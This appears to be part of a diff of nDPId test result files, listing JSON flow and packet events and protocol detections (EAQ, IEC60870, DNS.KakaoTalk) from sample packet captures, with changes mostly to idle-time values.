00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820949806,"flow_last_seen":1432821036155,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.141.66","src_port":41438,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}}
00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820953931,"flow_last_seen":1432821040151,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.137.68","src_port":59959,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}}
00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432820969101,"flow_last_seen":1432821033791,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.149.66","src_port":33356,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}}

24
test/results/IEC104.pcap.out
View File

@@ -1,17 +1,17 @@
00457{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"IEC104.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00543{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"IEC104.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1317629088495}
00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1317629088495,"flow_last_seen":1317629088495,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1317629088495,"l3_proto":"ip4","src_ip":"10.175.211.1","dst_ip":"10.119.105.26","src_port":2404,"dst_port":54768,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1317629088495,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1317629088495,"pkt":"eCvLK7lWABIAxkrACABFAAAoUqRAAH0GWeoKr9MBCndpGglk1fBIoLt3AFkTVVAQ\/elpjgAAAAAAAAAA"}
00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1317629088520,"flow_last_seen":1317629088520,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1317629088520,"l3_proto":"ip4","src_ip":"10.175.211.3","dst_ip":"10.119.105.26","src_port":2404,"dst_port":54769,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1317629088520,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1317629088520,"pkt":"eCvLK7lWABIAxkrACABFAAAoSx9AAH0GYW0Kr9MDCndpGglk1fFZgPwe3z\/\/ZlAQ+y9PxQAAAAAAAAAA"}
00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1317629088532,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1317629088532,"pkt":"eCvLK7lWABIAxkrACABFAAAuUsZAAH0GWcIKr9MBCndpGglk1fBIoLt3AFkTVVAY\/em9wgAAaAQBAEK5"}
00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1317629088495,"flow_last_seen":1317629088532,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1317629088532,"l3_proto":"ip4","src_ip":"10.175.211.1","dst_ip":"10.119.105.26","src_port":2404,"dst_port":54768,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}}
00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1317629088536,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1317629088536,"pkt":"eCvLK7lWABIAxkrACABFAAAuSyRAAH0GYWIKr9MDCndpGglk1fFZgPwe3z\/\/ZlAY+y+j+QAAaAQBAEK5"}
00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1317629088520,"flow_last_seen":1317629088536,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1317629088536,"l3_proto":"ip4","src_ip":"10.175.211.3","dst_ip":"10.119.105.26","src_port":2404,"dst_port":54769,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}}
00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1317629088731,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1317629088731,"pkt":"AAAMB6wBeCvLK7lWCABFAAAoJ9JAAIAGAAAKd2kaCq\/TAdXwCWQAWRNVSKC7fVAQAP5RXAAA"}
00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1317629088739,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1317629088739,"pkt":"AAAMB6wBeCvLK7lWCABFAAAoJ9tAAIAGAAAKd2kaCq\/TA9XxCWTfP\/9mWYD8JFAQAP5RXgAA"}
00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":15,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1317629088495,"flow_last_seen":1317629090498,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":252,"flow_tot_l4_payload_len":603,"flow_avg_l4_payload_len":50,"midstream":1,"thread_ts_msec":1317629090498,"l3_proto":"ip4","src_ip":"10.175.211.1","dst_ip":"10.119.105.26","src_port":2404,"dst_port":54768,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}}
00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":15,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1317629088520,"flow_last_seen":1317629088739,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":2,"midstream":1,"thread_ts_msec":1317629090498,"l3_proto":"ip4","src_ip":"10.175.211.3","dst_ip":"10.119.105.26","src_port":2404,"dst_port":54769,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}}
00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1317629088495,"flow_last_seen":1317629088495,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1317629088495,"l3_proto":"ip4","src_ip":"10.175.211.1","dst_ip":"10.119.105.26","src_port":2404,"dst_port":54768,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1317629088495,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1317629088495,"pkt":"eCvLK7lWABIAxkrACABFAAAoUqRAAH0GWeoKr9MBCndpGglk1fBIoLt3AFkTVVAQ\/elpjgAAAAAAAAAA"}
00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1317629088520,"flow_last_seen":1317629088520,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1317629088520,"l3_proto":"ip4","src_ip":"10.175.211.3","dst_ip":"10.119.105.26","src_port":2404,"dst_port":54769,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1317629088520,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1317629088520,"pkt":"eCvLK7lWABIAxkrACABFAAAoSx9AAH0GYW0Kr9MDCndpGglk1fFZgPwe3z\/\/ZlAQ+y9PxQAAAAAAAAAA"}
00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1317629088532,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1317629088532,"pkt":"eCvLK7lWABIAxkrACABFAAAuUsZAAH0GWcIKr9MBCndpGglk1fBIoLt3AFkTVVAY\/em9wgAAaAQBAEK5"}
00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1317629088495,"flow_last_seen":1317629088532,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1317629088532,"l3_proto":"ip4","src_ip":"10.175.211.1","dst_ip":"10.119.105.26","src_port":2404,"dst_port":54768,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}}
00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1317629088536,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1317629088536,"pkt":"eCvLK7lWABIAxkrACABFAAAuSyRAAH0GYWIKr9MDCndpGglk1fFZgPwe3z\/\/ZlAY+y+j+QAAaAQBAEK5"}
00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1317629088520,"flow_last_seen":1317629088536,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1317629088536,"l3_proto":"ip4","src_ip":"10.175.211.3","dst_ip":"10.119.105.26","src_port":2404,"dst_port":54769,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}}
00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1317629088731,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1317629088731,"pkt":"AAAMB6wBeCvLK7lWCABFAAAoJ9JAAIAGAAAKd2kaCq\/TAdXwCWQAWRNVSKC7fVAQAP5RXAAA"}
00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1317629088739,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1317629088739,"pkt":"AAAMB6wBeCvLK7lWCABFAAAoJ9tAAIAGAAAKd2kaCq\/TA9XxCWTfP\/9mWYD8JFAQAP5RXgAA"}
00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":15,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1317629088495,"flow_last_seen":1317629090498,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":252,"flow_tot_l4_payload_len":603,"flow_avg_l4_payload_len":50,"midstream":1,"thread_ts_msec":1317629090498,"l3_proto":"ip4","src_ip":"10.175.211.1","dst_ip":"10.119.105.26","src_port":2404,"dst_port":54768,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}}
00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":15,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1317629088520,"flow_last_seen":1317629088739,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":2,"midstream":1,"thread_ts_msec":1317629090498,"l3_proto":"ip4","src_ip":"10.175.211.3","dst_ip":"10.119.105.26","src_port":2404,"dst_port":54769,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}}
00551{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":15,"source":"IEC104.pcap","alias":"nDPId-test","packets-captured":15,"packets-processed":15,"total-skipped-flows":0,"total-l4-data-len":609,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":15,"global_ts_msec":1317629090498}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 15/15

242
test/results/KakaoTalk_chat.pcap.out
View File

@@ -60,21 +60,21 @@
00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":23,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069022252,"flow_last_seen":1430069022295,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1430069022295,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":43077,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"dn-l.talk.kakao.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"110.76.141.86"}}
00554{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1430069022295,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":126,"pkt_l4_len":90,"thread_ts_msec":1430069022295,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAG4b2QAANREBFgq8AQEKGFK8ADViHQBaJnpwlYGAAAEAAgAAAAAFdXAtZ3AEdGFsawVrYWthbwNjb20AAAEAAcAMAAUAAQAABasAEAV1cC1ncAR0YWxrAmdswBfAMgABAAEAAACsAARuTI0a"}
00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":24,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069022252,"flow_last_seen":1430069022295,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1430069022295,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":25117,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"up-gp.talk.kakao.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"110.76.141.26"}}
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":25,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022297,"flow_last_seen":1430069022297,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069022297,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"103.246.57.251","src_port":51021,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1430069022297,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069022297,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADzzVkAAPwZJoAoYUrxn9jn7x00fkMsN9JkAAAAAoAI5CGIPAAACBAV4BAIICgALB88AAAAAAQMDBw=="}
00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1430069022411,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069022411,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAADwAAEAALQZO92f2OfsKGFK8H5DHTSs\/AzbLDfSaoBIWoGVTAAACBAV4BAIICpj2V6UACwfPAQMDCQ=="}
00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1430069022419,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1430069022419,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADTzV0AAPwZJpwoYUrxn9jn7x00fkMsN9JorPwM3gBAAc6oGAAABAQgKAAsH25j2V6U="}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":32,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069026012,"flow_last_seen":1430069026012,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069026012,"l3_proto":"ip4","src_ip":"216.58.221.10","dst_ip":"10.24.82.188","src_port":80,"dst_port":35922,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1430069026012,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069026012,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcACiq7kAArAYRrNg63QoKGFK8AFCMUmKi4jFDN+TzUBH\/\/6QYAAA="}
00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1430069026058,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069026058,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACgAAEAAPwYptwoYUrzYOt0KjFIAUEM35dFioucAUBA+dl\/2AAA="}
00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1430069026148,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069026148,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcACiq70AArQYQq9g63QoKGFK8AFCMUmKi4jFDN+TzUBH\/\/6QYAAA="}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069026370,"flow_last_seen":1430069026370,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069026370,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35503,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1430069026370,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069026370,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADzmtkAAPwbpMgoYUryt\/GECiq8Bu\/wa79AAAAAAoAI5CCGaAAACBAV4BAIICgALCWYAAAAAAQMDBw=="}
00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1430069027366,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069027366,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADzmt0AAPwbpMQoYUryt\/GECiq8Bu\/wa79AAAAAAoAI5CCE2AAACBAV4BAIICgALCcoAAAAAAQMDBw=="}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1430069027408,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1430069027408,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACyOBEAA+AaI9K38YQIKGFK8AbuKr2Aiq0X8Gu\/RYBIRHJekAAACBAV4"}
